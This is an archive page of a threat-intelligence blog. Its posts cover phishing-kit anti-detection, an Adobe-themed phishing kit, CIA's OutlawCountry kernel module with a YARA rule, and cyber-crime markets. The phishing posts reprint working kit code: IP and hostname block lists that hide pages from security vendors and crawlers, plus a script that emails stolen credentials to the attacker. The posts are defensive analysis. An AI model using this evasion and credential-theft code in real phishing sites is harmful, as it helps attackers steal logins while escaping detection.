xorl %eax, %eax

Archive for the ‘threat intelligence’ Category

Threat Intelligence: Phising kits anti-detection

leave a comment »

In my past posts I described a few common techniques used by phising kits authors to evade detection. This seems to be becoming more and more common among popular phising kits. Here I will present a few very common techniques that I came across lately.

The first one is the common anti-detection based on the client’s details such as originating IP address, user-agent string, domain name, etc. I have seen a few references of phising kit authors describing those with the slang term “antiboots” and “antibot”. You can see an example of such files below.

$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit",);
foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
		header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");

$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^64.71.*.*", "^206.207.*.*", "^207.70.*.*", "^209.19.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*",  "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "", "^198.25.*.*", "^64.106.213.*");
if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
     header('HTTP/1.0 404 Not Found');
} else {
     foreach($bannedIP as $ip) {
          if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
               header('HTTP/1.0 404 Not Found');
               die("<h1>404 Not Found</h1>The page that you have requested could not be found.");

The above means that as an organization you need some “clean” networks, not associated to your organization from where you should be running your phising detection engines. But this is not the only one, another common technique employed by many phising kit authors is to embed static content of the target page in Base64 encoded format as shown below.

  <div class='dialog'>
  ... skipping ...

This means that if your detection engine was relying on callback images or static content, it is very likely that it will not be able to detect those phising pages. Additionally, I have identified numerous phising kits that do not target credentials only but they are after OAuth2 tokens too. This means that you have to tune your systems to support this attack scenario too. Finally, I have identified at least two separate phising kits which deliver the content AES encrypted along with a JavaScript implementation of AES to do the decryption during the client side execution.

ini_set('display_errors', '1');

/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  */
/*  AES implementation in PHP                                                                     */
/*    (c) Chris Veness 2005-2014 www.movable-type.co.uk/scripts                                   */
/*    Right of free use is granted for all commercial or non-commercial use under CC-BY licence.  */
/*    No warranty of any form is offered.                                                         */
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  */

Class Aes
     * AES Cipher function [§5.1]: encrypt 'input' with Rijndael algorithm
     * @param input message as byte-array (16 bytes)
     * @param w     key schedule as 2D byte-array (Nr+1 x Nb bytes) -
     *              generated from the cipher key by keyExpansion()
     * @return      ciphertext as byte-array (16 bytes)
    public static function cipher($input, $w)

Phising remains the top intrusion method for the past couple of years. Make sure that you adapt and combat this effectively. I hope that the above information were useful to some defenders.

Written by xorl

February 20, 2018 at 09:59

Threat Analysis: Marketplaces for verified social media accounts

leave a comment »

Cyber-crime is a massive ecosystem and social media plays a key role in it. One way to stop them would be to disrupt their supply chain and this is what this post is about. Most cyber-crime groups utilize verified social media accounts to operate below the radar while executing their illegal activities. Namely, here are a few common reasons why cyber-criminals buy and use verified social media accounts.

  • Anonymously set up marketplaces on social media platforms like Facebook
  • Implement so-called “blackhat SEO” and sell services (advertisements, likes, reviews, comments, etc.)
  • Distribute or promote fake news
  • Avoid bot detection for common automated operations (spam, C2, phising, etc.)
  • Anonymously use the services offered by that social media platform

There was an excellent slide at HITB GSEC 2017 in the “Facebook – The Deep & Dark Web for Threat Actors in Asia*” presentation by Fadli B. Sidek explaining really nicely the benefits of the use of those Facebook verified accounts by cyber-criminals. Here is that slide.

The above are quite clear indicators that this area of cyber-crime will keep on growing. Some will be developing verified social media accounts and others will be buying them for uses like the ones described.

This underground market has been expanding so rapidly that many threat actors are developing and selling malicious tooling known as “Turboer”. This type of software is designed to exploit popular social media platforms in order to claim high-value account names, and assign them to a verified account. Typically, cyber-criminals subsequently sell those verified accounts for much higher prices.

The reason I made this post was my initial comment, if we would like to disrupt the supply chain of cyber-criminals this is an area we need to target. As more and more cyber-criminals utilize those verified social media accounts for malicious purposes, the demand increases, and the ecosystem keeps on growing.

Written by xorl

December 19, 2017 at 20:54

Understanding CIA’s OutlawCountry

leave a comment »

On 30 June 2017 WikiLeaks leaked the manual of OutlawCountry. This is a malicious Linux Kernel Module (LKM) which exists at least since June 2015. Let’s see what it does…

The OutlawCountry is a LKM for Linux kernel 2.6.32 (64-bit CentOS/Red Hat 6.x) which is used to create a hidden NetFilter table (according to the manual the hidden table has hardcoded name “dpxvke8h18”) which later the operator of the malicious LKM can use to issue NAT rules. Below you can see how CIA’s EDG (Engineering Development Group) intended to use this tool.

The concept is that the operator will secretly install OutlawCountry in TARG_1 and then use it to re-route the traffic between WEST_2 and EAST_3, EAST_4, and EAST_5. Basically, this can be done to either covertly eavesdrop on traffic transmitted or redirect specific traffic to a CIA controlled system. Below you see an example from its manual where all traffic from IP address to IP address on port 33/tcp is redirected to IP address on port 55/tcp.

 iptables -t dpxvke8h18 -A PREROUTING \
        -p tcp -s -d --dport 33 \
        -j DNAT --to-destination

The installation and removal of the module is done via standard Linux module management commands (insmod, rmmod) except “modprobe” which doesn’t work as the module is not in “modules.dep” file. To check whether you are infected from this specific version of OutlawCountry it is as simple as checking for the existence of this table name with a command like the following.

iptables -t dpxvke8h18 -L -nv

Also, just like normal NAT iptables, it requires IP forwarding to be set (so /proc/sys/net/ipv4/ip_forward must be set to 1) and if iptables service is restarted, the OutlawCountry goes into “dormant” state in which it will be loaded but the hidden table will no longer be present. To re-enable it, the operator has to remove and install the kernel module again. Unfortunately, WikiLeaks did not release the source code of the tool. So, based purely on the documentation provided you can use the following simple “CIA_OutlawCountry.yar” YARA rule I wrote to search for it on your Linux systems.

import "hash"

rule OutlawCountry
        author = "Anastasios Pingios (xorl)"
        description = "CIA OutlawCountry v1.0 LKM signature"
        filename = "nf_table_6_64.ko"
		filename = "nf_table.ko"
        reference = "https://wikileaks.org/vault7/document/OutlawCountry_v1_0_User_Manual/OutlawCountry_v1_0_User_Manual.pdf"
        date = "02-12-2017"

        $s1 = "dpxvke8h18" ascii

        $s1 or
        filesize < 10KB and
        hash.md5(0, filesize) == "2cb8954a3e683477aa5a084964d4665d"  

Written by xorl

December 2, 2017 at 18:45

Deeper look in an Adobe Acrobat phising website

leave a comment »

It all started with a Tweet by Yves Agostini on 26 November 2017. It was the discovery of an exposed (probably under construction) phising website. Just like what I did in “Deeper look in an AppleID Phising Campaign”, I will do a basic investigation on this to see what we can learn to be better prepared for similar future campaigns. You can see the phising website’s landing page below.

The phising website is hosted in mbiomedik[.]undip[.]ac[.]id ( which is the Magister Biomedik Universitas Diponegoro (Master of Biomedical University of Diponegoro) in Indonesia. The website is running an outdated version of Joomla which was probably what the threat actor used to compromise this website. Under the “jkl” directory the threat actor uploaded and extracted acrobat.zip archive (MD5: 2f248c06a1d93b2b31409e8644866c40 SHA-1: a75b167ab3323ddb97ff12b9bb6ad425a36beaf7).

Based on the timestamp we can assume that the initial upload was on 7 November 2017. The archive has exactly the same structure as the phising website which implies that the threat actor simply extracted the files and started using it with no further modifications. You can see the directory structure of the archive below.

        │   └───FILES

The files in the archive have dates ranging from 16 January 2014 until 30 October 2017. The oldest file was “robots.txt” and the most recent was “send.php”. This is interesting as this is the file that included the email address where the stolen credentials are being sent.


define("EMAIL", "rainingbow19@gmail.com");

It is worth noting that most files were modified in 2016 so probably it was an old phising toolkit that was updated. Another unique feature is the “blocker.php” file which runs on the index page and runs a series of checks to avoid detection. The filtering is based on client’s hostname, IP range, and user-agent string. You can see the complete “blocker.php” code below.


$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit", "paypal");
foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
    header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");

$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*",  "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "", "^198.25.*.*", "^64.106.213.*");
if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
     header('HTTP/1.0 404 Not Found');
} else {
     foreach($bannedIP as $ip) {
          if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
               header('HTTP/1.0 404 Not Found');
               die("<h1>404 Not Found</h1>The page that you have requested could not be found.");

if(strpos($_SERVER['HTTP_USER_AGENT'], 'google') or strpos($_SERVER['HTTP_USER_AGENT'], 'msnbot') or strpos($_SERVER['HTTP_USER_AGENT'], 'Yahoo! Slurp') or strpos($_SERVER['HTTP_USER_AGENT'], 'YahooSeeker') or strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') or strpos($_SERVER['HTTP_USER_AGENT'], 'bingbot') or strpos($_SERVER['HTTP_USER_AGENT'], 'crawler') or strpos($_SERVER['HTTP_USER_AGENT'], 'PycURL') or strpos($_SERVER['HTTP_USER_AGENT'], 'facebookexternalhit') !== false) { header('HTTP/1.0 404 Not Found'); exit; }


When you visit the phising page you will notice that the URL includes “cmd-login” parameter followed by a hash. This is generated in “index.php” page as shown below. So, technically it is just a unique identifier.

$random=md5(date("Y-m-d H:i:s"));

The “cmd-login=” seems like a quite unique identifier in this phising toolkit. But it is not the only one, below you can see a code snippet of the code that sends the email with the stolen credentials to the threat actor. The exact same file was also uploaded on Reverse It on 2 October 2017 from dcrq[.]ga/1/365[.]zip which was a phising page for Office 365.

$message = build_message($_REQUEST);


$message = $message . "IP of sender: " . $ip ." ," . $country ." ," . $countrycode ." ," . $region ." ," . $city;

$message = $message . PHP_EOL.PHP_EOL."------Th@ w@s yOur LOG : SeNt tO [$my_email]------".PHP_EOL."";

$message = stripslashes($message);

$subject = "1 NEW LOG (($page ) : ($country))";

$subject = stripslashes($subject);
header("Location: delete_file.htm?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn");

It is worth noting that dcrq[.]ga/1/365[.]zip is from a shared hosting server based in Indonesia which has been used repeatedly for malware delivery and phising websites hosting. Below you can see the Office 365 phising page from this website.

The PHP also includes a GoogleDrive document which no longer exists.

$continue = "https://docs.google.com/a/e-mail.ua/file/d/0B3xRhEC_fLTHNzktb2NfR21oa2s/edit";

A search for this document on Google reveals only one result. A Finnish forum for IT discussions that has a discussion from November 2013 titled “tunnusten kalastelua?” (Translation: phishing scams?). There user “ossij” explains that when someone enters credentials in www[.]postecsa[.]com/finishfish.htm phising page, there was a redirection to this document. Based on the date, this is probably one of the very first cases of this phising toolkit being used in the wild.

The toolkit contains various different plugins, extensions, and old code from open source software (jQuery 1.2.1, CSS Browser Selector 0.5.3, etc.). The result of this is modern anti-detecion code (such as the “blocker.php” example shown earlier) along with direct content access like what you see below.

<html hola_ext_inject="disabled" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<script type="text/javascript">
function delayer(){
    window.location = "https://adobe.com"
<meta charset="utf-8">
<title>PDF ONLINE</title>
<link rel="shortcut icon" type="image/x-icon" href="https://wwwimages2.adobe.com/include/img/favicon.ico">
<style type="text/css">

On the other hand, the phising langing page itself not only it does not reference remote links from the target company, but it has all of the content hardcoded in the HTML page as Base64 encoded images. Below is a sample of the landing page’s content.

<div style="clear:both;"></div>
						<h2 style="color:#696767; font-family:verdana, arial; text-shadow: 0px 1px 1px #4d4d4d;">
QlsUA0BvoA0AaANAYNKcezQCbcP0rafE7f2aAbcsYlvPMIr5gP7dAEQYlu9Qj6wP7dAOS3/pe0eGp5uzQCkKU4aAzoA0AaANAGgDQBoA0AaANAf/2Q==" width="83"></h2><span style="position:relative; bottom:20px; color:#6c5a79; ">Sign in with your receiving email account to view document</span>							

The last HTML comment is another is a relatively unique artifact that we can use for a search. If we do that we will quickly notice that the exact same code (including the above comment) has been used in more phising attacks, some of them include PDF documents with links to phising websites. Below is a list of the different results I had from searching using the above comment.

The above screenshot is one of the PDF lure documents from the previously mentioned attacks. So, without diving more into details, here are some interesting lessons from this brief investigation of this particular Adobe-themed phising attack.

  • Threat actor “OLDLEGEND 360” has almost certainly being developing, improving and selling this phising toolkit at least since 2013.
  • Those phising attacks are delivered mostly via lure PDF documents.
  • The phising websites are a combination of hosted services and compromised legitimate websites.
  • The phising toolkit has a lot of legacy code but also various modern anti-detection techniques.
  • The phising toolkit will respond with a 404 when the request comes from known security companies, search engines, popular VPS & cloud providers, or the victim company.
  • The static content is hardcoded in the landing phising page as Base64 encoded strings.
  • The goal of the threat actor is to collect valid credentials for Adobe and Microsoft.
  • The collected credentials are being sent to the cyber-criminal via email which has to be configured in “send.php” file of the phising toolkit.

Written by xorl

November 30, 2017 at 00:37

Cyber-criminals and SS7 attacks

with one comment

Last week the news were flooded with some SS7 attack demonstration in Canada, an example of this was the “Hackers only needed a phone number to track this MP’s cellphone” by CBC News. The SS7 attacks have been known for years but the this news article reminded me of something I came across in a recent investigation. It started with the following PasteBin post.

This SS7 offer by threat actor “elitehackingservice” (email address: “elitehackingservice@gmail.com”) first appeared in late October 2017 and it is still active in various underground websites. The offer is $400 for four PDF documents that will guide an attacker on how to exploit SS7 to track and intercept cell phones. You can see the complete advertisement below.

I have released the official SS7 Network Exploits PDF.
This guide will instruct you how to hack into the SS7 network 
and how to track cell phones to their locations and how you can
intercept them from their carriers location.
There are 4 PDF files.
1. What is SS7, how it works and current vulnerabilities
2. Entry points to the SS7 Network Protocol
3. How to hack the SS7 Network Protocol step by step instructions.
4. How to locate and intercept specific cell numbers step by step instructions.
The price is $400.
Link to buy and download is: https://satoshibox.com/x65q8owqgnxbr3n8e3s7zfdz

Contact me on: elitehackingservices@gmail.com

Threat actor decided to use SatoshiBox to sell this tutorial, a website widely used by some cyber-criminals. Based on the description and the actual filenames from SatoshiBox we can deduce that here is exactly what buyers get from this offer.

  • Attacking-SS7-instructions.pdf (1.40MB): How to hack the SS7 Network Protocol step by step instructions
  • What-is-ss7.pdf (6.39MB): Entry points to the SS7 Network Protocol
  • celllocationandtracking.pdf (1.46MB): How to locate and intercept specific cell numbers step by step instructions
  • signalssystemvulnerabilitiesaugust2017.pdf (488.78KB): What is SS7, how it works and current vulnerabilities

It is worth noting that the Bitcoin address of this threat actor’s offer (3D8NZzzEkWtMiHwHyy4xw61FKmN23LvW54) doesn’t have any recorded transactions until the time of this writing. But we don’t know whether this collection was also being sold elsewhere. An interesting tactic employed by this threat actor to advertise this offer is commenting on popular video sharing websites relating to hacking software such as mobile phones keyloggers and RATs (Remote Access Trojans) tutorials or advertisments. You can see two examples of those below. Note that in those cases threat actor “elitehackingservices” used the handle “Mr HappyCoder” instead.

It is crucial to note that I have no indicators on the reliability or credibility of this threat actor. However, it might be something that you potentially want to investigate further if you are including SS7 attacks as part of your organization’s threat landscape.

Written by xorl

November 28, 2017 at 22:28

IOC Lifecycle & Enrichment

leave a comment »

One issue with cyber-security today is the outdated IOCs (Indicators of Compromise). For example, an IP address used to host a Command & Control server today, could host a legitimate service tomorrow. This means that there needs to be some sort of “IOC lifecycle”. Below is the lifecycle I usually propose for this.

The above works for the majority of the cases, but not for everything. Here is brief explanation of how this lifecycle of an IOC is split among those four different stages.

  1. Malicious activity: The first stage is that some sort of malicious activity is identified. This could be anything from a new malware campaign, a spear-phising attack, etc.
  2. IOC generation: This is the generation of unique artifacts/identifiers of this specific attack such as malware sample hashes, email addresses, IP addresses, domain names, etc.
  3. IOC use: The generated IOC is now integrated with the security solutions of the organization and is actively used to detect if this indicator is present.
  4. Archiving: After a defined expiration threshold the IOC is archived so that it is still searchable for investigations, but it has very low scoring compared to new IOCs when it comes to detection.

The above works for common workflows but when we introduce a Cyber-Threat Intelligence (CTI) capability then context is equally important as content. Meaning that seeing that 2 years ago IP address was “bad” is not as important as seeing that IP address was hosting a ZeuS Command & Control server and it is associated with an internal incident response case number. For this reason, the extended version of my initially proposed IOC lifecycle to include CTI capability is the one you see below.

The only difference is that before the archiving stage, there is an enrichment stage. This stage ensures that the IOC includes as much context as possible in order to provide value to subsequent investigations.

Written by xorl

November 28, 2017 at 21:47

Threat Analysis: Phone Verification Bypassing

leave a comment »

Here I will guide you through a common cyber-crime technique, bypassing phone verification services. As an additional security and verification control, many companies (like for example Google) require you to do some sort of phone verification in order to activate an account. No cyber-criminal would ever want to do that though as the newly created account is likely to be used for malicious activity.

As you can see from the above, the common practice in cyber-crime circles is the use of online SMS services, usually referred to as “virtual phones”. During my investigations I have identified a few different use cases of cyber-criminals using those services which are briefly listed below.

  • Verification of new accounts (for phising, fraud, etc.)
  • SMS verification for fraudulent payment transactions
  • Verification during fraudulent issuing of official documents

This is not very easy to track from a blue team perspective. However, not impossible. If you are suffering from fraudulent activities while enforcing some sort of phone verification, then this might be the reason. This means you should probably start investing in detection of software based phones as well as phones used by common providers of “virtual phones”.

Written by xorl

November 27, 2017 at 20:52